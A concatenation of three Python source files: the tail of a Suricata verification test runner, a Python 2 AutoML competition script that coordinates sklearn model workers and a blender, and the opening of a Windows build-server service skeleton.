print(line.strip())
def handle_exceptions(func):
def applicator(*args, **kwargs):
result = False
try:
result = func(*args,**kwargs)
except TestError as te:
print("===> {}: Sub test #{}: FAIL : {}".format(kwargs["test_name"], kwargs["test_num"], te))
check_args_fail()
kwargs["count"]["failure"] += 1
except UnsatisfiedRequirementError as ue:
if args and not args[0].quiet:
print("===> {}: Sub test #{}: SKIPPED : {}".format(kwargs["test_name"], kwargs["test_num"], ue))
kwargs["count"]["skipped"] += 1
else:
if result:
kwargs["count"]["success"] += 1
else:
print("\n===> {}: Sub test #{}: FAIL : {}".format(kwargs["test_name"], kwargs["test_num"], kwargs["check"]["args"]))
kwargs["count"]["failure"] += 1
return kwargs["count"]
return applicator
class Version:
"""
Class to compare Suricata versions.
"""
def is_equal(self, a, b):
"""Check if version a and version b are equal in a semantic way.
For example:
- 4 would match 4, 4.x and 4.x.y.
- 4.0 would match 4.0.x.
- 4.0.3 would match only 4.0.3.
"""
if not a.major == b.major:
return False
if a.minor is not None and b.minor is not None:
if a.minor != b.minor:
return False
if a.patch is not None and b.patch is not None:
if a.patch != b.patch:
return False
return True
def is_gte(self, v1, v2):
    """Return True if v1 is greater than or equal to v2."""
if v1.major < v2.major:
return False
elif v1.major > v2.major:
return True
if v1.minor < v2.minor:
return False
elif v1.minor > v2.minor:
return True
if v1.patch < v2.patch:
return False
return True
def is_lt(self, v1, v2):
    """Return True if v1 is less than v2."""
    if v1.major != v2.major:
        return v1.major < v2.major
    if v1.minor != v2.minor:
        return v1.minor < v2.minor
    return v1.patch < v2.patch
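# A short illustration of the comparison semantics above (mirrors the SelfTest
# cases near the top of this file):
#
#   >>> comp = Version()
#   >>> comp.is_equal(SuricataVersion(6, 0, 3), SuricataVersion(6, None, None))
#   True
#   >>> comp.is_lt(SuricataVersion(6, 0, 2), SuricataVersion(6, 0, 3))
#   True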
class SuricataConfig:
def __init__(self, version):
self.version = version
self.features = set()
self.config = {}
self.load_build_info()
def load_build_info(self):
output = subprocess.check_output([suricata_bin, "--build-info"])
start_support = False
for line in output.splitlines():
if line.decode().startswith("Features:"):
self.features = set(line.decode().split()[1:])
if "Suricata Configuration" in line.decode():
start_support = True
if start_support and "support:" in line.decode():
(fkey, val) = line.decode().split(" support:")
fkey = fkey.strip()
val = val.strip()
if val.startswith("yes"):
self.features.add(fkey)
def load_config(self, config_filename):
output = subprocess.check_output([
suricata_bin,
"-c", config_filename,
"--dump-config"])
self.config = {}
for line in output.decode("utf-8").split("\n"):
parts = [p.strip() for p in line.split("=", 1)]
if parts and parts[0]:
if len(parts) > 1:
val = parts[1]
else:
val = ""
self.config[parts[0]] = val
def has_feature(self, feature):
return feature in self.features
def check_requires(requires, suricata_config: SuricataConfig):
suri_version = suricata_config.version
for key in requires:
if key == "min-version":
min_version = requires["min-version"]
if not is_version_compatible(version=min_version,
suri_version=suri_version, expr="gte"):
raise UnsatisfiedRequirementError(
"requires at least version {}".format(min_version))
elif key == "lt-version":
lt_version = requires["lt-version"]
if not is_version_compatible(version=lt_version,
suri_version=suri_version, expr="lt"):
raise UnsatisfiedRequirementError(
"for version less than {}".format(lt_version))
elif key == "version":
req_version = requires["version"]
if not is_version_compatible(version=req_version,
suri_version=suri_version, expr="equal"):
raise UnsatisfiedRequirementError(
"only for version {}".format(req_version))
elif key == "features":
for feature in requires["features"]:
if not suricata_config.has_feature(feature):
raise UnsatisfiedRequirementError(
"requires feature %s" % (feature))
elif key == "env":
for env in requires["env"]:
if not env in os.environ:
raise UnsatisfiedRequirementError(
"requires env var %s" % (env))
elif key == "files":
for filename in requires["files"]:
if not os.path.exists(filename):
raise UnsatisfiedRequirementError(
"requires file %s" % (filename))
elif key == "script":
for script in requires["script"]:
try:
subprocess.check_call("%s" % script, shell=True)
except:
raise UnsatisfiedRequirementError(
"requires script returned false")
elif key == "pcap":
# Handle below...
pass
else:
raise Exception("unknown requires types: %s" % (key))
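# For reference, a test.yaml "requires" block exercising several of the keys
# handled above could look like this (an illustrative sketch, not taken from a
# real test; the feature and env names are placeholders):
#
#   requires:
#     min-version: 6
#     features:
#       - HAVE_LUA
#     env:
#       - MY_TEST_VAR
#     files:
#       - input.pcap
#     script:
#       - exit 0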
def find_value(name, obj):
"""Find the value in an object for a field specified by name.
Example names:
event_type
alert.signature_id
smtp.rcpt_to[0]
"""
parts = name.split(".")
for part in parts:
if part == "__len":
# Get the length of the object. Return -1 if the object is
# not a type that has a length (numbers).
try:
return len(obj)
except:
return -1
name = None
index = None
m = re.match(r"^(.*)\[(\d+)\]$", part)
if m:
name = m.group(1)
index = m.group(2)
else:
name = part
if not name in obj:
return None
obj = obj[name]
if index is not None:
try:
obj = obj[int(index)]
except:
return None
return obj
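# A worked example of the dotted-path lookup implemented above:
#
#   >>> event = {"event_type": "alert",
#   ...          "alert": {"signature_id": 2010937},
#   ...          "smtp": {"rcpt_to": ["a@example.com", "b@example.com"]}}
#   >>> find_value("alert.signature_id", event)
#   2010937
#   >>> find_value("smtp.rcpt_to[1]", event)
#   'b@example.com'
#   >>> find_value("smtp.rcpt_to.__len", event)
#   2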
def is_version_compatible(version, suri_version, expr):
config_version = parse_suricata_version(version)
version_obj = Version()
func = getattr(version_obj, "is_{}".format(expr))
if not func(suri_version, config_version):
return False
return True
class FileCompareCheck:
def __init__(self, config, directory):
self.config = config
self.directory = directory
def run(self):
if WIN32:
    print("skipping file-compare check on windows")
    return True
expected = os.path.join(self.directory, self.config["expected"])
filename = self.config["filename"]
try:
if filecmp.cmp(expected, filename):
return True
else:
raise TestError("%s %s \nFAILED: verification failed" % (expected, filename))
except Exception as err:
raise TestError("file-compare check failed with exception: %s" % (err))
class ShellCheck:
def __init__(self, config, env):
self.config = config
self.env = env
def run(self):
if not self.config or "args" not in self.config:
raise TestError("shell check missing args")
try:
if WIN32:
print("skipping shell check on windows")
return True
output = subprocess.check_output(self.config["args"], shell=True, env=self.env)
if "expect" in self.config:
return str(self.config["expect"]) == output.decode().strip()
return True
except subprocess.CalledProcessError as err:
raise TestError("Shell command failed: {} -> {}".format(
self.config, err.output))
class StatsCheck:
def __init__(self, config, outdir):
self.config = config
self.outdir = outdir
def run(self):
stats = None
with open("eve.json", "r") as fileobj:
for line in fileobj:
event = json.loads(line)
if event["event_type"] == "stats":
stats = event["stats"]
for key in self.config:
val = find_value(key, stats)
if val != self.config[key]:
raise TestError("stats.%s: expected %s; got %s" % (
key, str(self.config[key]), str(val)))
return True
class FilterCheck:
def __init__(self, config, outdir, suricata_config):
self.config = config
self.outdir = outdir
self.suricata_config = suricata_config
self.suri_version = suricata_config.version
def run(self):
requires = self.config.get("requires", {})
req_version = self.config.get("version")
min_version = self.config.get("min-version")
if req_version is not None:
requires["version"] = req_version
if min_version is not None:
requires["min-version"] = min_version
feature = self.config.get("feature")
if feature is not None:
requires["features"] = [feature]
check_requires(requires, self.suricata_config)
if "filename" in self.config:
json_filename = self.config["filename"]
else:
json_filename = "eve.json"
if not os.path.exists(json_filename):
raise TestError("%s does not exist" % (json_filename))
count = 0
with open(json_filename, "r") as fileobj:
for line in fileobj:
event = json.loads(line)
if self.match(event):
count += 1
if count == self.config["count"]:
return True
if "comment" in self.config:
raise TestError("%s: expected %d, got %d" % (
self.config["comment"], self.config["count"], count))
raise TestError("expected %d matches; got %d for filter %s" % (
self.config["count"], count, str(self.config)))
def match(self, event):
for key, expected in self.config["match"].items():
if key == "has-key":
val = find_value(expected, event)
if val is None:
return False
elif key == "not-has-key":
val = find_value(expected, event)
if val is not None:
return False
else:
val = find_value(key, event)
if val != expected:
if str(val) == str(expected):
print("Different types but same string", type(val), val, type(expected), expected)
return False
return False
return True
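# For reference, the kind of check this class evaluates is declared in test.yaml
# roughly as follows (an illustrative sketch; the field values are placeholders):
#
#   checks:
#     - filter:
#         count: 1
#         match:
#           event_type: alert
#           alert.signature_id: 2010937
#           has-key: alert.severity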
class TestRunner:
def __init__(self, cwd, directory, outdir, suricata_config, verbose=False,
force=False, quiet=False):
self.cwd = cwd
self.directory = directory
self.suricata_config = suricata_config
self.verbose = verbose
self.force = force
self.output = outdir
self.quiet = quiet
# The name is just the directory name.
self.name = os.path.basename(self.directory)
# List of thread readers.
self.readers = []
# Load the test configuration.
self.config = None
self.load_config()
self.suricata_config.load_config(self.get_suricata_yaml_path())
def load_config(self):
if os.path.exists(os.path.join(self.directory, "test.yaml")):
self.config = yaml.safe_load(
open(os.path.join(self.directory, "test.yaml"), "rb"))
if self.config is None:
self.config = {}
def setup(self):
if "setup" in self.config:
for setup in self.config["setup"]:
for command in setup:
if command == "script":
subprocess.check_call(
"%s" % setup[command],
shell=True,
cwd=self.output)
def check_skip(self):
if not "skip" in self.config:
return
if isinstance(self.config["skip"], bool):
if self.config["skip"]:
raise UnsatisfiedRequirementError("skipped by default")
return
for skip in self.config["skip"]:
if "uid" in skip:
if WIN32:
raise UnsatisfiedRequirementError("uid based skip not supported on Windows")
if os.getuid() == skip["uid"]:
if "msg" in skip:
msg = skip["msg"]
else:
msg = "not for uid %d" % (skip["uid"])
raise UnsatisfiedRequirementError(msg)
if "feature" in skip:
if self.suricata_config.has_feature(skip["feature"]):
if "msg" in skip:
msg = skip["msg"]
else:
msg = "not for feature %s" % (skip["feature"])
raise UnsatisfiedRequirementError(msg)
if "config" in skip:
for pattern, need_val in skip["config"].items():
for key, val in self.suricata_config.config.items():
if re.match(pattern, key):
if str(need_val) == str(val):
raise UnsatisfiedRequirementError(
"not for %s = %s" % (
key, need_val))
def check_requires(self):
requires = self.config.get("requires", {})
check_requires(requires, self.suricata_config)
# Check if a pcap is required or not. By default a pcap is
# required unless a "command" has been provided.
if not "command" in self.config:
if "pcap" in requires:
pcap_required = requires["pcap"]
else:
pcap_required = True
if pcap_required and not "pcap" in self.config:
if not glob.glob(os.path.join(self.directory, "*.pcap")) + \
glob.glob(os.path.join(self.directory, "*.pcapng")):
raise UnsatisfiedRequirementError("No pcap file found")
def build_env(self):
env = os.environ.copy()
env["SRCDIR"] = self.cwd
env["TZ"] = "UTC"
env["TEST_DIR"] = self.directory
env["OUTPUT_DIR"] = self.output
env["ASAN_OPTIONS"] = "detect_leaks=1"
return env
def run(self, outdir):
if not self.force:
self.check_requires()
self.check_skip()
if WIN32 and "setup" in self.config:
raise UnsatisfiedRequirementError("test \"setup\" not supported on Windows")
shell = False
if "command" in self.config:
# on Windows skip 'command' tests
if WIN32:
raise UnsatisfiedRequirementError("\"command\" tests are not supported on Windows")
args = self.config["command"]
shell = True
else:
args = self.default_args()
env = self.build_env()
safe_env = {}
for key in env:
safe_env[key] = str(env[key])
if "count" in self.config:
count = self.config["count"]
else:
count = 1
if "exit-code" in self.config:
expected_exit_code = self.config["exit-code"]
else:
expected_exit_code = 0
for _ in range(count):
# Cleanup the output directory.
if os.path.exists(self.output):
shutil.rmtree(self.output)
os.makedirs(self.output)
self.setup()
stdout = open(os.path.join(self.output, "stdout"), "w")
stderr = open(os.path.join(self.output, "stderr"), "w")
if shell:
template = string.Template(args)
cmdline = template.substitute(safe_env)
else:
for a in range(len(args)):
args[a] = string.Template(args[a]).substitute(safe_env)
cmdline = " ".join(args) + "\n"
open(os.path.join(self.output, "cmdline"), "w").write(cmdline)
p = subprocess.Popen(
args, shell=shell, cwd=self.directory, env=env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.start_reader(p.stdout, stdout)
self.start_reader(p.stderr, stderr)
for r in self.readers:
r.join()
r = p.wait()
if r != expected_exit_code:
raise TestError("got exit code %d, expected %d" % (
r, expected_exit_code))
check_value = self.check()
if VALIDATE_EVE:
check_output = subprocess.call(["{}/check-eve.py".format(TOPDIR), outdir, "-q"])
if check_output != 0:
raise TestError("Invalid JSON schema")
if not check_value["failure"] and not check_value["skipped"]:
if not self.quiet:
print("===> %s: OK%s" % (os.path.basename(self.directory), " (%dx)" % count if count > 1 else ""))
elif not check_value["failure"]:
if not self.quiet:
print("===> {}: OK (checks: {}, skipped: {})".format(os.path.basename(self.directory), sum(check_value.values()), check_value["skipped"]))
return check_value
def pre_check(self):
if "pre-check" in self.config:
subprocess.call(self.config["pre-check"], shell=True)
@handle_exceptions
def perform_filter_checks(self, check, count, test_num, test_name):
count = FilterCheck(check, self.output,
self.suricata_config).run()
return count
@handle_exceptions
def perform_shell_checks(self, check, count, test_num, test_name):
count = ShellCheck(check, self.build_env()).run()
return count
@handle_exceptions
def perform_stats_checks(self, check, count, test_num, test_name):
count = StatsCheck(check, self.output).run()
return count
@handle_exceptions
def perform_file_compare_checks(self, check, count, test_num, test_name):
count = FileCompareCheck(check, self.directory).run()
return count
def reset_count(self, dictionary):
for k in dictionary.keys():
dictionary[k] = 0
def check(self):
pdir = os.getcwd()
os.chdir(self.output)
count = {
"success": 0,
"failure": 0,
"skipped": 0,
}
try:
self.pre_check()
if "checks" in self.config:
self.reset_count(count)
for check_count, check in enumerate(self.config["checks"]):
for key in check:
if key in ["filter", "shell", "stats", "file-compare"]:
func = getattr(self, "perform_{}_checks".format(key.replace("-","_")))
count = func(check=check[key], count=count,
test_num=check_count + 1, test_name=os.path.basename(self.directory))
else:
print("FAIL: Unknown check type: {}".format(key))
finally:
os.chdir(pdir)
if count["failure"] or count["skipped"]:
return count
success_c = count["success"]
count["success"] = 1 if not success_c else success_c
return count
def default_args(self):
args = []
if self.suricata_config.valgrind:
suppression_opt = "--suppressions=%s" % os.path.join(self.cwd, "qa/valgrind.suppress")
args += [ "valgrind", "-v", "--error-exitcode=255", suppression_opt ]
args += [
os.path.join(self.cwd, "src/suricata"),
]
# Load args from config file.
if "args" in self.config:
assert isinstance(self.config["args"], list)
for arg in self.config["args"]:
args += re.split(r"\s", arg)
# In Suricata 5.0 the classification.config and
# reference.config were moved into the etc/ directory. For now
# check there and the top level directory to still support
# 4.1.
classification_configs = [
os.path.join(self.cwd, "etc", "classification.config"),
os.path.join(self.cwd, "classification.config"),
]
for config in classification_configs:
if os.path.exists(config):
args += ["--set", "classification-file=%s" % config]
break
reference_configs = [
os.path.join(self.cwd, "etc", "reference.config"),
os.path.join(self.cwd, "reference.config"),
]
for config in reference_configs:
if os.path.exists(config):
args += ["--set", "reference-config-file=%s" % config]
break
# Add other fixed arguments.
args += [
"--init-errors-fatal",
"-l", self.output,
]
if "ips" in self.name:
args.append("--simulate-ips")
args += ["-c", self.get_suricata_yaml_path()]
# Find pcaps.
if "pcap" in self.config:
args += ["-r", self.config["pcap"]]
else:
pcaps = glob.glob(os.path.join(self.directory, "*.pcap"))
pcaps += glob.glob(os.path.join(self.directory, "*.pcapng"))
if len(pcaps) > 1:
raise TestError("More than 1 pcap file found")
if pcaps:
args += ["-r", pcaps[0]]
# Find rules.
rules = glob.glob(os.path.join(self.directory, "*.rules"))
if not rules:
args.append("--disable-detection")
elif len(rules) == 1:
args += ["-S", rules[0]]
else:
raise TestError("More than 1 rule file found")
return args
def get_suricata_yaml_path(self):
"""Return the path to the suricata.yaml that will be used for this
test."""
if os.path.exists(os.path.join(self.directory, "suricata.yaml")):
return os.path.join(self.directory, "suricata.yaml")
return os.path.join(self.cwd, "suricata.yaml")
def start_reader(self, input, output):
t = threading.Thread(
target=pipe_reader, args=(input, output, self.verbose))
t.start()
self.readers.append(t)
def check_args_fail():
if args.fail:
with lock:
check_args['fail'] = 1
def check_deps():
try:
cmd = "jq --version > nul" if WIN32 else "jq --version > /dev/null 2>&1"
subprocess.check_call(cmd, shell=True)
except:
print("error: jq is required")
return False
try:
cmd = "echo suricata | xargs > nul" if WIN32 else "echo | xargs > /dev/null 2>&1"
subprocess.check_call(cmd, shell=True)
except:
print("error: xargs is required")
return False
return True
def run_test(dirpath, args, cwd, suricata_config):
with lock:
if check_args['fail'] == 1:
raise TerminatePoolError()
name = os.path.basename(dirpath)
outdir = os.path.join(dirpath, "output")
if args.outdir:
outdir = os.path.join(os.path.realpath(args.outdir), name, "output")
test_runner = TestRunner(
cwd, dirpath, outdir, suricata_config, args.verbose, args.force,
args.quiet)
try:
results = test_runner.run(outdir)
if results["failure"] > 0:
with lock:
count_dict["failed"] += 1
failedLogs.append(dirpath)
elif results["skipped"] > 0 and results["success"] == 0:
with lock:
count_dict["skipped"] += 1
elif results["success"] > 0:
with lock:
count_dict["passed"] += 1
except UnsatisfiedRequirementError as ue:
if not args.quiet:
print("===> {}: SKIPPED: {}".format(os.path.basename(dirpath), ue))
with lock:
count_dict["skipped"] += 1
except TestError as te:
print("===> {}: FAILED: {}".format(os.path.basename(dirpath), te))
check_args_fail()
with lock:
count_dict["failed"] += 1
def run_mp(jobs, tests, dirpath, args, cwd, suricata_config):
print("Number of concurrent jobs: %d" % jobs)
pool = mp.Pool(jobs)
try:
for dirpath in tests:
pool.apply_async(run_test, args=(dirpath, args, cwd, suricata_config))
except TerminatePoolError:
pool.terminate()
pool.close()
pool.join()
def run_single(tests, dirpath, args, cwd, suricata_config):
try:
for dirpath in tests:
run_test(dirpath, args, cwd, suricata_config)
except TerminatePoolError:
sys.exit(1)
def main():
global TOPDIR
global args
if not check_deps():
return 1
parser = argparse.ArgumentParser(description="Verification test runner.")
parser.add_argument("-v", dest="verbose", action="store_true")
parser.add_argument("--force", dest="force", action="store_true",
help="Force running of skipped tests")
parser.add_argument("--fail", action="store_true",
help="Exit on test failure")
parser.add_argument("--testdir", action="store",
help="Runs tests from custom directory")
parser.add_argument("--exact", dest="exact", action="store_true",
help="Use supplied name to make an exact match")
parser.add_argument("--skip-tests", nargs="?", default=None,
help="Skip tests with a given pattern")
parser.add_argument("--outdir", action="store",
help="Outputs to custom directory")
parser.add_argument("--valgrind", dest="valgrind", action="store_true",
help="Run tests in with valgrind")
parser.add_argument("--self-test", action="store_true",
help="Run self tests")
parser.add_argument("--debug-failed", dest="debugfailed", action="store_true",
help="Prints debug output for failed tests")
parser.add_argument("-q", "--quiet", dest="quiet", action="store_true",
help="Only show failures and end summary")
parser.add_argument("patterns", nargs="*", default=[])
if LINUX:
parser.add_argument("-j", type=int, default=min(8, mp.cpu_count()),
help="Number of jobs to run")
args = parser.parse_args()
if args.self_test:
return unittest.main(argv=[sys.argv[0]])
print("Warning: EVE files will not be valided: jsonschema module not found.")
TOPDIR = os.path.abspath(os.path.dirname(sys.argv[0]))
skipped = 0
passed = 0
failed = 0
# Get the current working directory, which should be the top
# suricata source directory.
cwd = os.getcwd()
# Expected locations in a built source tree (the binary is assumed to
# live in src/ after an in-tree build).
suricata_yaml = os.path.join(cwd, "suricata.yaml")
suricata_bin = os.path.join(cwd, "src", "suricata")
if not (os.path.exists(suricata_yaml) and
os.path.exists(suricata_bin)):
print("error: this is not a suricata source directory or " +
"suricata is not built")
return 1
# Create a SuricataConfig object that is passed to all tests.
suricata_config = SuricataConfig(get_suricata_version())
suricata_config.valgrind = args.valgrind
tdir = os.path.join(TOPDIR, "tests")
if args.testdir:
tdir = os.path.abspath(args.testdir)
# First gather the tests so we can run them in alphabetic order.
tests = []
for dirpath, dirnames, filenames in os.walk(tdir, followlinks = True):
# The top directory is not a test...
if dirpath == os.path.join(TOPDIR, "tests"):
continue
if dirpath == tdir:
continue
basename = os.path.basename(dirpath)
if args.skip_tests:
skip_tests_opt = False
patterns = args.skip_tests.split(",")
for pattern in patterns:
if args.exact:
if pattern == basename:
skip_tests_opt = True
break
elif basename.find(pattern) > -1:
skip_tests_opt = True
break
if skip_tests_opt:
continue
# A directory containing a test.yaml is itself a test.
if "test.yaml" in filenames:
# Clear dirnames so os.walk does not descend into this test's subdirectories.
dirnames[0:] = []
else:
continue
if not args.patterns:
tests.append(dirpath)
else:
for pattern in args.patterns:
if args.exact:
if pattern == basename:
tests.append(dirpath)
elif basename.find(pattern) > -1:
tests.append(dirpath)
# Sort alphabetically.
tests.sort()
if LINUX:
run_mp(args.j, tests, dirpath, args, cwd, suricata_config)
else:
run_single(tests, dirpath, args, cwd, suricata_config)
passed = count_dict["passed"]
failed = count_dict["failed"]
skipped = count_dict["skipped"]
print("")
print("PASSED: %d" % (passed))
print("FAILED: %d" % (failed))
print("SKIPPED: %d" % (skipped))
if args.debugfailed:
if len(failedLogs) > 0:
print("")
print("Failed tests debug output:")
for dirpath in failedLogs:
print("- Test %s:" % os.path.basename(dirpath))
for r, d, f in os.walk(dirpath+"/output"):
for fname in f:
path = os.path.join(r, fname)
print(" - %s" % path)
try:
with open(path, "r") as fcontents:
try:
buf = fcontents.read().decode()
print(buf)
except:
print(" - [Not dumping file that won't utf-8 decode]")
except Exception as err:
print("Failed to open %s: %s" % (path, str(err)))
if failed > 0:
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
automl.py
|
#Damir Jajetic, 2015
from sklearn.externals import joblib
from sklearn import *
from sklearn.utils import shuffle
import libscores
import multiprocessing
import time
import os
import numpy as np
import data_io
import psutil
import data_converter
import automl_worker
import automl_models
import automl_blender
import automl_sb
import automl_rf
import automl_gb
def baseline(output_dir, basename, valid_num, test_num, target_num):
preds_valid = np.zeros([valid_num , target_num])
preds_test = np.zeros([test_num , target_num])
cycle = 0
filename_valid = basename + '_valid_' + str(cycle).zfill(3) + '.predict'
data_io.write(os.path.join(output_dir,filename_valid), preds_valid)
filename_test = basename + '_test_' + str(cycle).zfill(3) + '.predict'
data_io.write(os.path.join(output_dir,filename_test), preds_test)
def predict(LD, Loutput_dir, Lstart, Ltime_budget, Lbasename, running_on_codalab):
try:
train_split = int(len(LD.data['Y_train'])*0.6)
test_split = int(len(LD.data['Y_train'])*0.8)
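# train_split/test_split carve the (shuffled) labelled data into roughly
# 60/20/20 slices; exactly how each slice is used for fitting vs. scoring
# is decided inside the worker modules (automl_worker, automl_sb, ...).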
baseline(Loutput_dir, Lbasename, LD.info['valid_num'], LD.info['test_num'], LD.info['target_num'])
LD.data['X_train'], LD.data['Y_train'] = shuffle(LD.data['X_train'], LD.data['Y_train'] , random_state=1)
try:
if LD.info['task'] != 'regression':
for Le in range(10): # a proper stratified split would consume more time
if len(np.unique(LD.data['Y_train'][:train_split])) != len(np.unique(LD.data['Y_train'][test_split:])):
try:
LD.data['X_train'], LD.data['Y_train'] = shuffle(LD.data['X_train'], LD.data['Y_train'] , random_state=1)
except:
pass
except:
pass
if LD.info['task'] != 'regression':
try:
yt_raw = np.array(data_converter.convert_to_bin(LD.data['Y_train'], len(np.unique(LD.data['Y_train'])), False))
except:
yt_raw = LD.data['Y_train']
else:
yt_raw = LD.data['Y_train']
# Strategy: N workers each try one of the prediction models listed in a separate file (described later).
# Every worker pushes its CV score and its predictions for the train, valid and test data into shared data,
# and a separate blender worker uses that data to build a linear ensemble.
# Regardless of strategy, for competition purposes it is good to run the work in separate processes that can easily be killed.
# There are 2 events visible to all workers:
# a) stop_writing - makes sure we don't kill a process in the middle of writing predictions
# b) exploit ("start growing") - after this point, stop searching for the best parameters and just build new trees (or apply a similar strategy)
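# A worker process (automl_worker.worker, defined in its own module) is
# assumed to follow roughly this pattern -- illustrative sketch only, not
# the actual implementation:
#
#   while time_remains:
#       with semaphore:                    # shared semaphore (created below) limits concurrent fitting
#           model.fit(X_slice, y_slice)    # fit / grow the current model
#           score = cv_score(model)        # score on the held-out folds
#       if score improves:
#           push score + train/valid/test predictions into the shared namespace
#       if exploit_event.is_set():
#           stop exploring new parameters, only keep growing the current model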
stop_writing_event = multiprocessing.Event()
exploit_event = multiprocessing.Event()
manager = multiprocessing.Manager()
shared_data = manager.Namespace()
shared_data.LD = LD
shared_data.yt_raw =yt_raw
# These are 3 dedicated workers (see the warm-start sketch below):
# 1. fast predictors trained on an increasing data sample
# 2. randomized decision trees predictor with an increasing number of estimators (warm start)
# 3. boosting predictor with an increasing number of estimators (warm start)
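# The warm-start trick used by workers 2 and 3 is the standard sklearn
# pattern, e.g. (illustrative only):
#   clf = ensemble.RandomForestClassifier(n_estimators=20, warm_start=True)
#   clf.fit(X, y)
#   clf.n_estimators += 20   # grow extra trees without refitting the old ones
#   clf.fit(X, y)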
#1.
try:
shared_sb_data = manager.Namespace()
shared_sb_data.raw_model = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model1 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model2 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model3 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model4 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
sb_process = multiprocessing.Process(target=automl_sb.worker, args=([ shared_data, shared_sb_data, Lstart, Ltime_budget, train_split, test_split]))
sb_process.start()
except:
pass
#2.
try:
shared_rf_data = manager.Namespace()
shared_rf_data.model1 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
rf_process = multiprocessing.Process(target=automl_rf.worker, args=([ shared_data, shared_rf_data, Lstart, Ltime_budget, train_split, test_split]))
rf_process.start()
except Exception as e:
print e
#3.
try:
shared_gb_data = manager.Namespace()
shared_gb_data.model1 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
gb_process= multiprocessing.Process(target=automl_gb.worker, args=([ shared_data, shared_gb_data, Lstart, Ltime_budget, train_split, test_split]))
gb_process.start()
except Exception as e:
print e
#This is main part of strategy
# We will create namespace for sharing data between workers
shared_data = manager.Namespace()
shared_data.LD = LD
shared_data.yt_raw =yt_raw
# automl_models.py should list all models (sklearn format only) with additional properties:
# model - the model instance (see the illustrative entry below)
# blend_group - we linearly ensemble the N best models, but don't want several near-identical ones;
# to avoid this, only the best model from each group is ensembled
# getter - updater - setter - after the exploit signal, the getter reads an "interesting" parameter
# from the model, the updater updates it, and the setter writes it back. This repeats until the end.
# Example: "number of estimators: get 80, update 80+20, push 100; next time read 100, update 120, push 120, ..."
# generator - parameters that are changed in the model on every iteration.
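# An entry of that list is assumed to look roughly like this (illustrative
# only -- the real definitions live in automl_models.py):
#   {"model": "ensemble.RandomForestClassifier(n_estimators=80, random_state=1)",
#    "blend_group": "forest",
#    "getter": "n_estimators",
#    "updater": "n_estimators + 20",
#    "setter": "n_estimators",
#    "generator": "max_features"}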
models = automl_models.get_models(shared_data)
models_count = len(models)
# Create a semaphore that caps how many workers may fit models concurrently; fewer slots are allowed when memory usage is already high.
if psutil.virtual_memory()[2] > 50:
Lncpu = 1
elif psutil.virtual_memory()[2] > 40:
Lncpu = 2
else:
Lncpu = 6
semaphore = multiprocessing.Semaphore(Lncpu)
try:
#Creating N workers
for Lnum in range(models_count):
exec("shared_data.worker"+str(Lnum) + ' = {"done":0, "score":0, ' +
'"preds_valid": None, "preds_test": None, ' +
'"model":' + models[Lnum] ["model"]+ ', ' +
'"blend_group": "%s", ' +
'"getter": "%s", ' +
'"updater": "%s", ' +
'"setter": "%s", ' +
'"generator": "%s" ' +
'}') % (models[Lnum] ['blend_group'],models[Lnum] ['getter'], models[Lnum] ['updater'], models[Lnum] ['setter'], models[Lnum] ['generator'])
workers = [multiprocessing.Process(target=automl_worker.worker, args=([tr_no, shared_data, exploit_event, semaphore, train_split, test_split])) for tr_no in range(models_count)]
for wr in workers:
wr.start()
except Exception as e:
print e
try:
Lnw = Lnum
except:
Lnw = 0
blender_process = multiprocessing.Process(target=automl_blender.blender, args=([ shared_data, shared_sb_data, shared_rf_data, shared_gb_data, Lnw, stop_writing_event, Loutput_dir, Lbasename, Lstart, Ltime_budget, train_split, test_split]))
blender_process.start()
try:
explore_time = max(Ltime_budget - (time.time() - Lstart) - 60,0)
time.sleep (explore_time)
exploit_event.set()
except:
pass
while( (Ltime_budget - 40) > (time.time() - Lstart)):
time.sleep (1)
print "Stop signal sent", time.ctime(), "time left", Ltime_budget - (time.time() - Lstart)
stop_writing_event.set()
time.sleep (8)
try:
for wr in workers:
try:
wr.terminate()
except:
pass
except:
pass
try:
sb_process.terminate()
except:
pass
try:
rf_process.terminate()
except:
pass
try:
gb_process.terminate()
except:
pass
try:
blender_process.terminate()
except:
pass
print "Done", time.ctime(), "time left", Ltime_budget - (time.time() - Lstart)
except Exception as e:
print "exception in automl_automl", time.ctime(), "left=", Ltime_budget - (time.time() - Lstart), str(e)
try:
for wr in workers:
try:
wr.terminate()
except:
pass
except:
pass
try:
sb_process.terminate()
except:
pass
try:
rf_process.terminate()
except:
pass
try:
gb_process.terminate()
except:
pass
try:
blender_process.terminate()
except:
pass
|
buildserver.py
|
#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import argparse
import ctypes
import functools
import shutil
import subprocess
import sys
import tempfile
import threading
import traceback
import os.path
import urllib.parse as urlparse
import winreg as _winreg  # registry lookup for installed Pythons (Windows-only, like the rest of this script)
class BuildHTTPServer(ThreadingMixIn, HTTPServer):
allow_reuse_address = True
advapi32 = ctypes.windll.advapi32
SC_MANAGER_ALL_ACCESS = 0xf003f
SC_MANAGER_CREATE_SERVICE = 0x02
SERVICE_WIN32_OWN_PROCESS = 0x10
SERVICE_AUTO_START = 0x2
SERVICE_ERROR_NORMAL = 0x1
DELETE = 0x00010000
SERVICE_STATUS_START_PENDING = 0x00000002
SERVICE_STATUS_RUNNING = 0x00000004
SERVICE_ACCEPT_STOP = 0x1
SVCNAME = 'youtubedl_builder'
LPTSTR = ctypes.c_wchar_p
START_CALLBACK = ctypes.WINFUNCTYPE(None, ctypes.c_int, ctypes.POINTER(LPTSTR))
class SERVICE_TABLE_ENTRY(ctypes.Structure):
_fields_ = [
('lpServiceName', LPTSTR),
('lpServiceProc', START_CALLBACK)
]
HandlerEx = ctypes.WINFUNCTYPE(
ctypes.c_int, # return
ctypes.c_int, # dwControl
ctypes.c_int, # dwEventType
ctypes.c_void_p, # lpEventData,
ctypes.c_void_p, # lpContext,
)
